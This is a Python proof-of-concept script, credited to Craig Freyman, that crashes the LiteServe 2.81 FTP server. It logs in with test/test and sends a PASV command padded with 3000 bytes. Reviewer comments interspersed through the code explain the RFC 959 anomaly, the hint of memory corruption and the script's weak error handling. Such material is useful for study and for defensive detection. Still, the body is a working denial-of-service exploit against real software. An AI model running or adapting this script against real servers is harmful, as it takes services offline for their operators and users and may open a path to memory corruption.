#!/usr/bin/python
#Title: LiteServe 2.81 PASV Command DoS
#Author: Craig Freyman (@cd1zz)
#Date: Bug found July 25, 2011 - Vendor approved release August 7, 2011
#Tested on Windows XP SP3 and Server 2003 SP2
#Software: http://www.cmfperception.com/liteserve.html
#Notes: In certain conditions that I could not reproduce reliably, registers were
#overwritten. There are a number of other FTP commands that exhibit the same behavior.
#
# Reviewer notes (defensive reading of this proof of concept):
# - Python 2 script. It logs in on the FTP control channel and then sends a
#   single PASV line carrying a 3000-byte argument.
# - RFC 959 defines PASV without any argument, so a PASV line with trailing
#   data, or any control-channel line of this size, is anomalous by itself
#   and is a reasonable thing to alert on or drop at a proxy.
# - The author's note about overwritten registers suggests memory corruption
#   rather than a clean abort, so the impact should not be assumed to stop at
#   loss of availability. The note also says other commands behave the same
#   way, so a filter on PASV alone is probably not sufficient.
# - Server replies are read and thrown away: the script never confirms that
#   the login worked or that the service actually stopped.

import socket
import struct
import sys
import time

# The target address is the only required argument.
if len(sys.argv) < 2:
    print("[-]Usage: %s <target addr> " % sys.argv[0])
    sys.exit(0)

target = sys.argv[1]

# An optional second argument is stored here but is not read anywhere below.
if len(sys.argv) > 2:
    platform = sys.argv[2]

# 3000 'A' bytes used as the PASV argument.
crash = "\x41" * 3000

ftp_ctrl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    ftp_ctrl.connect((target, 21))
except:
    # NOTE(review): the bare except hides the real error (and also catches
    # Ctrl-C), and the script still exits with status 0 on failure.
    print("[-] Connection to %s failed!" % target)
    sys.exit(0)

print("[*] Sending %r byte crash..." % len(crash))

# Log in with the fixed credentials test/test; each reply is read and
# discarded without being checked.
for login_line in ("USER test\r\n", "PASS test\r\n"):
    ftp_ctrl.send(login_line)
    ftp_ctrl.recv(1024)

# The oversized PASV line. No reply is read afterwards.
pasv_line = "PASV " + crash + "\r\n"
ftp_ctrl.send(pasv_line)

print("Sleeping...")
time.sleep(5)
ftp_ctrl.close()